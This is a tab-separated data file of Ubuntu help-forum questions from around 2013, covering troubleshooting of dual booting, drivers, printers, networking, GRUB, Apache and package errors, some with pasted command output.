386399	windows 8 slow boot with ubuntu	so i dual booted my windows 8 ( pre-installed ) with ubuntu , at now , whenever i choose windows 8 from the boot menu , it boots up in 30 seconds , as opposed to the 12 - 15 seconds when i only boot windows 8 . this 30 seconds speed is similar to a windows 8 cold boot , and i do not know why windows 8 boots up so slowly . this time is counted from the time of selection to the showing of the lock screen . ubuntu 13.10 / windows 8.1 / cached 750g 5200 rpm hard drive / less than 6 month old
386402	how can i execute cinelerra-cv ?	i installed cinelerra and i ca n't find it in my computer here 's my message . smallhuman @ smallhuman-ubuntu : ~ $ sudo apt-get install cinelerra-cv reading package lists ... done building dependency tree reading state information ... done cinelerra-cv is already the newest version . the following packages were automatically installed and are no longer required : efibootmgr secureboot-db shim use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . it looks cinelerra-cv has installed in my computer , but i ca n't find it . i hit super key , type 'cinelerra ' or 'cinelerra-cv ' , but nothing founded . and if i try to search cinerra-cv in software center , there is no program like it . please help : )
386404	i want to install 12.04 instead of 13.10 , what should i do ?	i run ubuntu 13.10 but i think it does n't work properly . iâm facing problems , being unable to listen to the music and watch movies , i either ca n't use internet . machine looks connected , but when browser do not load any web page . because of mentioned problems i believe think it is better to install ubuntu 12.04.3 and i have downloaded it already . how can i uninstall 13.10 and install 12.04 . is there any one who can help me please ?
386406	my camera does n't work on ubuntu	i have an acer aspire 5670 with a crystaleye webcam . but in cheese it does n't even detect that there is a camera . what can i do ?
386407	headphones not working in pulseaudio	i have the newest lubuntu , and when i plug in headphones , i get no sound.i use pulseaudio , and it 's configured with analog stereo duplex.there 's sound from the internal speakers when i pull out the plug .
386408	ca n't connect to facebook on 13.10	for a few days i have n't been able to connect to facebook . this is not a browser specific problem because if i ping www.facebook.com i get : ping star.c10r.facebook.com ( 31.13.84.8 ) 56 ( 84 ) bytes of data . ping : sendmsg : operation not permitted ping : sendmsg : operation not permitted ping : sendmsg : operation not permitted i tried browsing with firefox ( main browser ) and chromium just to verify this issue . both did n't work . i checked the /etc/hosts file and it looks like this : 127.0.0.1 localhost 127.0.1.1 < my host name > # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters and i think this is how it always looked like . i did n't consciously change it . i am able to connect to facebook from windows on the same machine . i 'm using xubuntu 13.10 .
386413	wireless internet connected but not working . terminal works , but nothing else	i am running lubuntu right now but am facing some trouble . the computer says i am connected to my wireless internet , but when i use firefox or any other browser it wo n't show the web pages . i have tried changing my dns and that did n't work . my computer is connected to the internet though a alfa networking awus036h usb wireless card . honestly this is very frustrating . i also tried xubuntu to the same result .
386414	monochrome on a colour monitor under xfce - easy switching ?	is there a way to switch , on the fly , between colour and monochrome graphics . even nicer would be to have a preview for how the screen would look to a colour blind user as well . that however is a side-issue , i 'm interested in quickly checking how figures i 'm working on will look printed b+w . i 've seen this compiz-based solution , but as i understand it , that 's for unity only , not xfce , so is there a method . ( technically , the primary machine i 'm interested in doing this on is ubuntu 12.04lts+xfce , and not xubuntu )
386415	skype for 13.04	how to insall skype in 13.04 , i used this command -- - sudo apt-get install skype bt it comes like this sudo apt-get install skype output : [ sudo ] password for sixdee : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
386420	how to open gparted terminal ?	i read this doc of gparted to recover from booting issues when a partition is moved . to test the command grub on gparted terminal , i want to open the terminal but not finding a way from my ubuntu 13.04 . when i run sudo gparted & on my shell terminal , it opens gui and so i ca n't test the commands . how to open the terminal ?
386423	ca n't install ubuntu 12.04 lts on dell vostro 3460	i trying to install ubuntu 12.04 lts on dell vostro 3460 , intel core i7-3632qm , 1tb sata + 32gb ssdr msata . my goal is to install dual boot ( windows 8 is already installed ) . after i boot from ubuntu cd , i get the following screen : ( from this screen you ca n't define the disks and move forward with the installation . )
386428	viewing nvidia geforce card control panel from ubuntu dual-boot with windows 7	i have dual-booted ubuntu using wubi from win7 in a separate g : drive . now where can i find my nvidia control panel that is installed in windows 7 ? or do i have to install it again in ubuntu ? if yes , how do i do that ? i am using nvidia geforce 9600gt as i have installed ubuntu from wubi , does it means that i am using windows 7 with an ubuntu interface , so if windows crashes the ubuntu install will not work either ? please help with the logic to clear my views with wubi and a normal ubuntu install via usb/dvd .
386431	can ubuntu live cd help to recover if i move partitions ?	i read this doc of gparted to recover from booting issues when a partition is moved . there it mentions under the heading fixing grub boot problem , how to do . it says to run grub command from gparted terminal and run the necessary commands . i have n't yet confirmed how it works but i 'm on my way to do that . i would like to know whether installing grub using ubuntu live cd can solve my purpose . earlier i had always successfully able to recover from booting problems using live cd . now this is the 1st time i 'm moving my /boot partitions and a few other partitions of ubuntu installed on my hard disk . can live cd help here also ?
386432	will i lose my files when i replace my windows os with ubuntu ?	will i lose my files when i replace my windows os with ubuntu ?
386435	why does ubuntu install default to minimum swap partition size ?	when installing ubuntu unless you do a manual partition , you get roughly and x+.5 mb swap space , where x is the amount of ram present . at least this has been my experience . i that official ubuntu documentation ( https : //help.ubuntu.com/community/swapfaq ) recommends having 2x ram for the swap partition and indicates that x is the minimum why are n't we defaulting to larger swap sizes , especially considering the relatively low expense of storage ?
386438	`` boot failed '' when trying to install ubuntu 13.10	hello i 'm trying to install ubuntu 13.10 out of my flash drive and into an external hard drive . but everytime i try to boot it says `` boot failed '' . did anyone get this error before ? because i really need help .
386441	i am looking for a good pdf reader/editor	i am searching for a good pdf reader that supports text highligthing , and with a possibility to add some comments on a page . can you recommend some ? ? ? thanks ! ! !
386442	how to make lxpanel show up on both the monitors	i recently installed lxpnael for having a all open windows list . it shows up by default only on one of my monitors can i show it also on my other monitor ? also can i also do it this way - the lxpanel on any monitor only shows the windows open on that monitor ?
386445	how to use libreoffice writer in simdock	i am new at ubuntu and i have installed simdock , and when i use edit in simdock in run command i tried enter : soffice.bin and this was for to make it run libreoffice writer , and my question is what to write in to edit to make it run , and i tryied sevel times that could make the icon display but not run libreoffice .
386449	what is ubuntu for windows ?	people are telling me to download it so be anonymous but i do n't get it what does it do ? what exactly is it ?
386453	eclipse does not work in ubuntu 12.04	i have search on a lot of similar problem in this website and other but i always have problem my eclipse 4.3 64 bit does not work in my ubuntu 12.04 64 bit and does not show me any error just when i click on the icon eclipse luncher i dont see any error , the file is executable java -version java version `` 1.7.0_25 '' openjdk runtime environment ( icedtea 2.3.10 ) ( 7u25-2.3.10-1ubuntu0.12.04.2 ) openjdk 64-bit server vm ( build 23.7-b01 , mixed mode ) which java /usr/bin/java i mentioned that when i try to execute some jars java it works well but when i try to execute direclty by terminal ./eclipse/eclipse it gives me no such file or directory : ( please give me some help its 3 days i have some problem
386457	installing ubuntu over windows 7	i 'm thinking about replacing my actual os ( windows 7 home premium 64 bit ) with the latest version of ubuntu , but i 'm totally new with this `` switching os '' thing . what steps should i follow to correctly replace windows with ubuntu ? i 'm using a samsung laptop , model 305v5a s02 .
386462	wifi led continuosly blinking in xubuntu 13.10	i have hp 6730s base model notebook which has a wifi/bluetooth button to turn on/off the wifi and bluetooth .also it shows yellow led when wireless devices are off and blue when on . but in xubuntu 13.10 while downloading ( or even surfing the net ) the led 's are blinking and changing color . yellow then blue then again yellow and so on ( like disco lights ) how to solve this issue ? edit : i typed the command on the terminal and it says the following about my wireless module : 02:00.0 network controller [ 0280 ] : intel corporation pro/wireless 5100 agn [ shiloh ] network connection [ 8086:4237 ] also this happens only when bluetooth is not enabled
386463	cpu power mode occasionally changing to performance	the cpu power mode is occasionally changing to performance which causes my laptop to overheat and shutdown : ( is there any way to prevent that ?
386465	rhythmbox missing from sound applet on tray after reinstall on uhuntu 12.04 gnome classic	i had an rhythmbox in sound applet on tray but i had a problem in rhythmbox recently , when i wanted to play something rhythmbox was just playing some weird noise so i reinstalled rhythmbox and after reinstall of rhythmbox , it disappeared from sound applet . and now i have only sound indicator , rhythmbox is disappeared . how do i get rhythmbox back to be like this ? http : //ubuntuguide.net/wp-content/uploads/2012/04/rhythmbox.png now it 's only mute and sound settings . i would show you better but my reputation does n't allow me to post images sorry .
386467	error : file '/grub/i386-pc/normal.mod ' not found in ubuntu 13.10	i 've installed ubuntu 13.10 , but after rebooting i get the message : grub loading : welcome to grub ! error : file '/grub/i386-pc/normal.mod ' not found entering rescue mode ... grub rescue > i have the following partitons setup : /dev/sdb5 : /boot ext4 500mb /dev/sdb6 : swap 4gb /dev/sdb7 : / ext4 60gb /dev/sdb1 : ntfs 900gb i have already tried solution from `` error : file '/grub/i386-pc/normal.mod ' not found '' and `` fix grub2 after installing ubuntu 12.04 '' but did not get success . i am using 1tb external hdd for this and do n't want to mess the windows on /dev/sdaxy . i have acer travel mate with intel i5 processor,4 gb ram . i am using iso image of 64 bit ubuntu named `` ubuntu-13.10-desktop-amd64.iso '' .. please help me , i have tried various solution but did not fix it for last 3 days .
386470	ubuntu server 13.10 saucy edition hang at boot time during installation with usbdrive	i am trying to install ubuntu server 13.10 saucy edition with usbdisk , i already made my usbdrive bootable and place iso image file and installation media to usbdrive but when i boot my new pc , i got a blank screen with `` mbr '' printing on it , just after 2 seconds it diappear and i got a new blank screen with some weird small white bright rectangular shape at left bottom side . it hangs at this time and installation stopped , for recognition of problem i am attaching hang screen here , let me know if is any solution ? my reputation is below 10 so i cant post my image here .
386473	how to use partitions i already made ?	i am a new ubuntu user . while installing the system , i made a partitions which i can see in system monitor , but i do n't know how to use them and how can i save my pictures folder there , for example . how can i use their memory ?
386474	tried gnome 3.10 on ubuntu 13.10 . how can i get unity back ?	i am running 13.10 and installed gnome 3.10 with the gnome3-next ppa from team gnome , as explained in an article on webupd8 . how can i get back to unity ? i did a ppa purge and now sort of have unity back , but still have the gnome boot screen , the font , the close button for windows on the right side . also if i minimize an application , xorg and the application have around 100 % cpu usage . i also tried sudo apt-get install unity and sudo apt-get dist-upgrade , but it 's already up to date . i have my home folder backed up with dăšjă dup , but i would like to avoid reinstalling and reconfiguring my whole system .
386475	cups printer `` unplugged or turned off ''	i install cups 1.5.3 from official repository in ubuntu 12.04 amd64 arch . after i add my usb printer , cups always says `` unplugged or turned off '' . lpstat -p printer legend_lj2500 disabled since thu 05 dec 2013 07:40:34 pm cst - unplugged or turned off in system-config-printer , choosing `` enable '' does not work . after i chose `` enable '' , the mark disappeared immediately . what is the matter ? thanks this is error_log file http : //paste.ubuntu.com/6524468/
386477	what is the command to be able page up/down a long text ?	i keep forgetting and i am not sure how to look this up if for example i want to see the ls commands -- help , its very long i remember there 's a command that allows you to go up and down on the output text - how do i do that ? i tried nano but for some reason it does n't work as well as i thought it did ( also ps the command i am looking for ls is to see hidden files , if u want you could tell me what that is on the way )
386478	i need help setting up my printer	i am trying to print to an hp deskjet 2510 series connected to my time capsule . i 'm running 13.10 on my macbook pro . i added the printer and it says it is connected , but when i try to print anything it just sits in the queue processing . any tips here knowing that the printer works fine when i am using osx .
386483	about new software installation on ubuntu	i have tried to install new software like qt creator , visual studio and google chrome , but it will not install and it shows me an error saying : check your internet connection .
386484	which one is better ubuntu 12.04.3 ( 32 bit ) or ( 64 bit ) ?	i am going to download ubuntu 12.04.3 lts , and i will burn it to a dvd ... i try it with usb and it was 64 bit.. and gives error in middle.. so this time i am using a dvd maybe it might work ... but i dont know which bit to use 32 bit or 64 bit ... but i am thinkng maybe it gives the error again with 64 bit i have 4gb ram ... and windows 8 pro 64 bit and i love ubuntu alot ... . its just amazing and fast ... and i just try ( try it without installation ) and it was awesome !
386485	how can i un-stall ubunto 13.4	i have installed windows 8 it was working properly for me but after windows 8 i tried to use ubunto 13.4 then from cd i installed it i replaced with windows 8 , now i have only ubunto but i want to get back my windows 8 and deleting ubunto but during installing windows 8 it says there has no enough driver please help me what must i do to deleting ubunto and installing windows again thanks for advance ...
386488	can i convert/read jrprint files	i have an epos system that churns out .jrprint files can i view/print/convert these files ?
386490	firefox does not recognize iprint client	my firefox does not recognize iprint . i keep getting the error iprint client is not installed from the following webpage shefuniprt.shef.ac.uk:631/ippdocs/isinstf.htm in my /usr/lib/firefox/plugins/ i have two files . ( one of them is symbolic link that i made ) libiprint.so npnipp.so any solutions ? in addition i have installed iprint by converting it from rpm using alien also output from the command iprntcmd -l is : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : can not open shared object file : no such file or directory p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory iprntcmd v04.40.00 listing printers on localhost . installed printer list : installed name = 4100 uri = ipps : //shefuniprt.shef.ac.uk/ipp/4100 cups uri= ipp : //localhost:631/printers/4100 make/model = sharp mx-5001n ps , 1.0 i installed i386 version of those libraries in the previous and error . i tried to print a test page and the following is what i get ( prntcmd -- testpage ipp : //shefuniprt.shef.ac.uk/ipp/4100 ) : /x86_64-linux-gnt-page to printer ipp : //shefuniprt.shef.ac.uk/ipp/4100 . *** error in `iprntcmd ' : free ( ) : invalid pointer : 0x08163984 *** ======= backtrace : ========= /lib/i386-linux-gnu/libc.so.6 ( +0x767c2 ) [ 0xf75507c2 ] /lib/i386-linux-gnu/libc.so.6 ( +0x77510 ) [ 0xf7551510 ] /usr/lib/i386-linux-gnu/libcups.so.2 ( +0x2ed73 ) [ 0xf76bcd73 ] /usr/lib/i386-linux-gnu/libcups.so.2 ( ippdelete+0x53 ) [ 0xf76bcce3 ] /opt/novell/lib/libiprint.so.1 ( mycupsdofilerequest+0x66d ) [ 0xf774b7fd ] /opt/novell/lib/libiprint.so.1 ( iprintsendrequest+0x81 ) [ 0xf7736e81 ] /opt/novell/lib/libiprint.so.1 ( iprintgetprinterstatus+0x5d0 ) [ 0xf7744f40 ] /opt/novell/lib/libiprint.so.1 ( iprintcreateprtref+0x381 ) [ 0xf7746b21 ] iprntcmd [ 0x804a2f5 ] /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xf5 ) [ 0xf74f3905 ] ======= memory map : ======== 08048000-0804f000 r-xp 00000000 08:02 1318402 /opt/novell/iprint/bin/iprntcmd 0804f000-08050000 rw-p 00006000 08:02 1318402 /opt/novell/iprint/bin/iprntcmd 0812e000-08195000 rw-p 00000000 00:00 0 [ heap ] f6e41000-f6e5c000 r-xp 00000000 08:02 1310725 /lib/i386-linux-gnu/libgcc_s.so.1 f6e5c000-f6e5d000 r -- p 0001a000 08:02 1310725 /lib/i386-linux-gnu/libgcc_s.so.1 f6e5d000-f6e5e000 rw-p 0001b000 08:02 1310725 /lib/i386-linux-gnu/libgcc_s.so.1 f6e5e000-f6e63000 r-xp 00000000 08:02 1315364 /lib/i386-linux-gnu/libnss_dns-2.17.so f6e63000-f6e64000 r -- p 00004000 08:02 1315364 /lib/i386-linux-gnu/libnss_dns-2.17.so f6e64000-f6e65000 rw-p 00005000 08:02 1315364 /lib/i386-linux-gnu/libnss_dns-2.17.so f6e65000-f6e70000 r-xp 00000000 08:02 1315384 /lib/i386-linux-gnu/libnss_files-2.17.so f6e70000-f6e71000 r -- p 0000a000 08:02 1315384 /lib/i386-linux-gnu/libnss_files-2.17.so f6e71000-f6e72000 rw-p 0000b000 08:02 1315384 /lib/i386-linux-gnu/libnss_files-2.17.so f6e72000-f6e7c000 r-xp 00000000 08:02 1315380 /lib/i386-linux-gnu/libnss_nis-2.17.so f6e7c000-f6e7d000 r -- p 00009000 08:02 1315380 /lib/i386-linux-gnu/libnss_nis-2.17.so f6e7d000-f6e7e000 rw-p 0000a000 08:02 1315380 /lib/i386-linux-gnu/libnss_nis-2.17.so f6e7e000-f6e93000 r-xp 00000000 08:02 1315365 /lib/i386-linux-gnu/libnsl-2.17.so f6e93000-f6e94000 r -- p 00014000 08:02 1315365 /lib/i386-linux-gnu/libnsl-2.17.so f6e94000-f6e95000 rw-p 00015000 08:02 1315365 /lib/i386-linux-gnu/libnsl-2.17.so f6e95000-f6e97000 rw-p 00000000 00:00 0 f6e97000-f6e9e000 r-xp 00000000 08:02 1315375 /lib/i386-linux-gnu/libnss_compat-2.17.so f6e9e000-f6e9f000 r -- p 00006000 08:02 1315375 /lib/i386-linux-gnu/libnss_compat-2.17.so f6e9f000-f6ea0000 rw-p 00007000 08:02 1315375 /lib/i386-linux-gnu/libnss_compat-2.17.so f6ebb000-f6edd000 r-xp 00000000 08:02 4981467 /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so f6edd000-f6ee0000 r -- p 00021000 08:02 4981467 /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so f6ee0000-f6ee1000 rw-p 00024000 08:02 4981467 /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so f6ee1000-f6f20000 r -- p 00277000 08:02 4985784 /usr/lib/locale/locale-archive f6f20000-f7120000 r -- p 00000000 08:02 4985784 /usr/lib/locale/locale-archive f7120000-f7122000 rw-p 00000000 00:00 0 f7122000-f7129000 r-xp 00000000 08:02 1315362 /lib/i386-linux-gnu/librt-2.17.so f7129000-f712a000 r -- p 00006000 08:02 1315362 /lib/i386-linux-gnu/librt-2.17.so f712a000-f712b000 rw-p 00007000 08:02 1315362 /lib/i386-linux-gnu/librt-2.17.so f712b000-f712c000 rw-p 00000000 00:00 0 f712c000-f712f000 r-xp 00000000 08:02 1310764 /lib/i386-linux-gnu/libgpg-error.so.0.10.0 f712f000-f7130000 r -- p 00002000 08:02 1310764 /lib/i386-linux-gnu/libgpg-error.so.0.10.0 f7130000-f7131000 rw-p 00003000 08:02 1310764 /lib/i386-linux-gnu/libgpg-error.so.0.10.0 f7131000-f7144000 r-xp 00000000 08:02 1315370 /lib/i386-linux-gnu/libresolv-2.17.so f7144000-f7145000 r -- p 00013000 08:02 1315370 /lib/i386-linux-gnu/libresolv-2.17.so f7145000-f7146000 rw-p 00014000 08:02 1315370 /lib/i386-linux-gnu/libresolv-2.17.so f7146000-f7148000 rw-p 00000000 00:00 0 f7148000-f714a000 r-xp 00000000 08:02 1318388 /lib/i386-linux-gnu/libkeyutils.so.1.4 f714a000-f714b000 r -- p 00002000 08:02 1318388 /lib/i386-linux-gnu/libkeyutils.so.1.4 f714b000-f714c000 rw-p 00003000 08:02 1318388 /lib/i386-linux-gnu/libkeyutils.so.1.4 f714c000-f714f000 r-xp 00000000 08:02 1315373 /lib/i386-linux-gnu/libdl-2.17.so f714f000-f7150000 r -- p 00002000 08:02 1315373 /lib/i386-linux-gnu/libdl-2.17.so f7150000-f7151000 rw-p 00003000 08:02 1315373 /lib/i386-linux-gnu/libdl-2.17.so f7151000-f719a000 r-xp 00000000 08:02 1318375 /lib/i386-linux-gnu/libdbus-1.so.3.7.4 f719a000-f719b000 r -- p 00048000 08:02 1318375 /lib/i386-linux-gnu/libdbus-1.so.3.7.4 f719b000-f719c000 rw-p 00049000 08:02 1318375 /lib/i386-linux-gnu/libdbus-1.so.3.7.4 f719c000-f719d000 rw-p 00000000 00:00 0 f719d000-f71b9000 r-xp 00000000 08:02 4989643 /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0 f71b9000-f71ba000 -- -p 0001c000 08:02 4989643 /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0 f71ba000-f71bb000 r -- p 0001c000 08:02 4989643 /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0 f71bb000-f71bc000 rw-p 0001d000 08:02 4989643 /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0 f71bc000-f71cc000 r-xp 00000000 08:02 4989645 /usr/lib/i386-linux-gnu/libtasn1.so.3.2.0 f71cc000-f71cd000 r -- p 0000f000 08:02 4989645 /usr/lib/i386-linux-gnu/libtasn1.so.3.2.0 f71cd000-f71ce000 rw-p 00010000 08:02 4989645 /usr/lib/i386-linux-gnu/libtasn1.so.3.2.0 f71ce000-f724f000 r-xp 00000000 08:02 1318369 /lib/i386-linux-gnu/libgcrypt.so.11.7.0aborted ( core dumped ) edit : please someone help . i have been having this problem for more than a year ! unfortunately universities love iprint but it 's soo incompatible ! any help on how to get it working . even my firefox wo n't recognize it even though it is in the plugins folder !
386493	compiling latest uvc driver	i want to compile and use latest uvc driver on 12.04 . i have researched on web but can not find anything helpful . could you please give me some advices on this topic ? best wishes .
386496	ubuntu 10.04 dhcp server upgraded and now severe problems	we have an ubuntu server at work . it acts as a dhcp server for 5 machines connected to a private 172.x.x.x network for internet access . the machines netboot from an image on the server . i tried to update the list of mac addresses to add some new machines to the system , following instructions from our ex support company . it could n't find the .txt file even though it was in the same folder . i googled and it suggested file corruption . there were about 60 updates pending . i originally selected no but after trying to reboot into recovery mode mode i think i must have said yes to these updates by accident . after installing the updates and rebooting , there are multiple graphics issues : no window decorations menus do n't work . firefox does n't really work sometimes x just does n't work at all . i 'm left with ttys . i 've never used unix/ubuntu before . and the support company has gone bust ! i 'm assuming that there was some file corruption already , but the huge update has also changed some of the settings for the dhcp and the video , along with who knows what else . how to solve these issues ?
386501	tally erp 9 need native solution for ubuntu	i have install tally erp 9 on ubuntu using wine . but its pretty slow and facing lot of problem . your forum suggested to us vm ware or other virtual os but that goes slow after lot of data entry in tally and also can not use in full screen . we most do tally and other works together like checking document while using tally and lot more work.. for that every time switch to win7 to ubuntu is headache . please provide some native solution for tally . as this program is used by over 90 % of small and medium entreprise in india . if this works well then ubuntu will boom in domestic business market in india . i hope you will provide any further solution for this . thanks jitendra
386503	nvidia geforce experience possible on ubuntu ? ( 13.10 )	new to ubuntu and wondering if anyone else has been able to install nvidia geforce experience on their ubuntu . ( preferably without wine ) . http : //www.geforce.com/geforce-experience i havenât been able to find any documentation on the internet about it , and have n't yet acquired the technical skills to figure it out by myself unfortunately . any help would be appreciated . i have a gtx 660 if that information is at all relevant .
386508	having virtualbox problems	i need a little help here trying to install ubuntu x86 32-bit over windows 7 x64 ( kept getting an error for the ubuntu x64 install , so i went with x32 ) . with virtualbox i made a 10gb partition fine , but when i go to install ubuntu it says i do n't have enough space and need 11.5 to install . i have a 120gb sata hard drive with 51gb free , and no matter how big i make the vm it says not enough space and installation space goes up . i 'm missing something here : do i need to partition the 120gb hd then build the vm ? this is my first time trying , so this is very confusing and frustrating right now .
386515	open pdf files in firefox	i have firefox and it was working fine . recently , i can not open pdf files even though i have a pdf tools . it start open it and then stuck ... so i have to download all pdf files in order to have a look at . can anyone explain me the problem ? ? ? i have firefox 25.0.1 and ubuntu 12.04
386517	ubuntu 13.10 strange touchpad behavior	so for a couple days now my touchpad has shown a really strange behavior . it started off with recognizing two-finger scrolling as three-finger switching between open applications and now the mouse seems to jump from one point to another . anybody has any idea what can be the cause for this behavior and how to fix it ? btw . i 'm running ubuntu 13.10 on a samsung series 9 900x3c . thanks a lot in advance jo
386522	can the norton bootable recovery tool read linux partitions ?	i have a pc that i can dual boot between windows 7 and ubuntu . if i use the norton bootable recovery tool to scan the pc for viruses ( by booting from the norton cd ) , will then norton also scan the linux partition ? can it read the linux file system format ?
386523	cant boot ubuntu through usb on pc ( works fine on my laptop ) but windows_usb works fine	now , i have much experience in installing distros from before and have successfully installed same ubuntu iso using same pen drive on this desktop many a times . now i 'm having trouble in doing so . on selecting option boot from usb my computer just displays `` loading from usb device ... '' . ( which is normal but nothing happens after this message ) this problem started to occur when i recently changed bios setting from ide to ahci ( i 'm not sure if this part is significant but it seems my problem appeared after i did this ) . failing to boot , i reverted back to ide but it did n't solve my problem . the usb boots successfully on my laptop.this meant- all files are fine on usb i tried booting windows iso from same pen drive on my desktop . it worked . this meant -pen drive boots successfully on desktop in case of windows . every time i use universal usb_installer to make bootable pen drive . ( tried unetbootin later -no effect ) i tried putting linux_mint_15 and linuxmint 16 on usb but same result for both ( boots on laptop fine but desktop=fail ) so pen drive boots . windows bootable usb is fine . any linux distro and it wont boot . system specs : gigabyte h55 mobo , zotac gtx 560ti , 8gb ddr3 i ca n't think of anything else to solve this problem . i have successful installed above iso 's on this very desktop using the very same pen drive many times .
386524	`` trying to overwrite * , which is also in package * '' how to fix it ?	dpkg : error processing /var/cache/apt/archives/linux-firmware_1.79.9_all.deb ( -- unpack ) : trying to overwrite '/lib/firmware/ar3k/ramps_0x31010000_40.dfu ' , which is also in package bt-dw1705-firmware 0.1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-firmware_1.79.9_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
386525	ca n't boot iso to my laptop in unetbootin ( xubuntu 12.04 & ubuntu 12.04 )	i was trying to install linux mint ( and a few other os 's ) through unetbootin . the iso 's burned alright , but when i tried to boot them up , i got the message : `` non-system boot disk . press any key to reboot . '' i ca n't figure this out , so please help if you can .
386531	compiz : unusually high cpu usage on ubuntu 13.10	since yesterday , after last system upgrade , compiz cpu usage has gone wild : horacio @ horacio-xps13 : ~ $ top top - 15:09:10 up 3:31 , 2 users , load average : 2,62 , 2,75 , 2,59 tasks : 261 total , 2 running , 259 sleeping , 0 stopped , 0 zombie % cpu ( s ) : 50,1 us , 4,6 sy , 0,0 ni , 45,1 id , 0,2 wa , 0,0 hi , 0,0 si , 0,0 st kib mem : 7731228 total , 6252616 used , 1478612 free , 239548 buffers kib swap : 15871996 total , 0 used , 15871996 free , 1451684 cached pid user pr ni virt res shr s % cpu % mem time+ command 2394 horacio 20 0 1929m 407m 44m s 126,3 5,4 80:07.62 compiz 5908 horacio 20 0 3242m 2,1g 59m s 60,2 28,6 30:27.73 firefox 1163 root 20 0 697m 433m 72m s 25,3 5,7 14:48.66 xorg 6017 horacio 20 0 905m 263m 34m s 4,0 3,5 2:07.85 plugin-containe 6669 horacio 20 0 707m 20m 13m s 3,0 0,3 0:01.31 gnome-terminal 6989 horacio 20 0 24876 1708 1128 r 0,7 0,0 0:00.05 top 2374 horacio 20 0 20236 940 768 s 0,3 0,0 0:05.01 syndaemon that while doing nothing besides firefox , if i open other programs it goes worse . the fun works without stop , it is definitively not normal . when i start a lubuntu session ( no compiz ) , i have no problem . any idea ? any suggestion ? please ? using ubuntu 13.10 on a dell xps 13 developer edition , with an intel graphics card . this is the result of lspci : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation qs77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 network controller : intel corporation centrino advanced-n 6235 ( rev 24 )
386532	hide lubuntu window top-border fullscreen chrome	i 'm running lubuntu 13.10 ( almost ) straight out the box . i 'm currently working on a chromium-kisok based app ( running in fullscreen ) . when chromium is running in fullscreen mode a 1px ( estimated ) white boarder appares on the top . this issue does not happen in ubuntu ( unity ) . using firefox in fullscreen mode workes ok , but as i need a browser that has fast gpu support i chosen to develop for chromium . anny idea how or if i can tweek this behavior ? if this ca n't be done in lubuntu , does anyone have a solution or workaround for chromium ? anny thoughts are much appreciated .
386533	where to buy ubuntu for android phone dock ?	where can i buy the ubuntu for android phone dock and phone with ubuntu on ? like this one : http : //www.ubuntu.com/phone/ubuntu-for-android
386534	does ubuntu remembers installed softwares in the trial mode from pen drive	i have not installed ubuntu in my computer . i am using it in trail mode ( by choosing the option 'try ubuntu without installing it ' . i want to ask that if i install some software on this ubuntu , will it be there the next time i run it from the pen drive ( by choosing again the same option . )
386536	how to find the attached devices uuid through terminal ?	is there any other method to find all the attached devices uuid through terminal ( other than using the blkidcommand ?
386543	setting up domains in a virtual machine running apache	i 'm runnning ubuntu server 12.04.3 lts as host system . i created a virtual machine running debian 7.2.0 and apache 2.2 using virtualbox 4.3.4 . the network bridging between host and guest system was done with vboxmanage modifyvm `` vm-www '' -- natpf1 `` www , tcp , ,80 , ,80 '' the dns has valid a record entry for the domain.com . i can access the apache root directory /var/www of the apache server over ip 100.100.100.100 . the forwarding of domain.com to the root directory is working . my /etc/apache2/sites-enabled/000-default looks like this : < virtualhost _default_ : * > documentroot /var/www < virtualhost > < virtualhost *:80 > servername domain.com serveralias www.domain.com documentroot /var/www/domain/ < /virtualhost > however if i access www.domain.com i am still redirected to /var/www and not to /var/www/domain . thanks for any suggestions !
386548	ca n't mount `` windows disk '' after installing ubuntu	i ca n't mount or even boot my windows disk after i installed ubuntu . can anyone help me , how can i solve this , please ? error message : could n't analyze partition : error mounting /dev/sdb1 at /media/mapos/7670a71a70a6dfdb : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/mapos/7670a71a70a6dfdb '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sdb1 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the'ro'mount option .
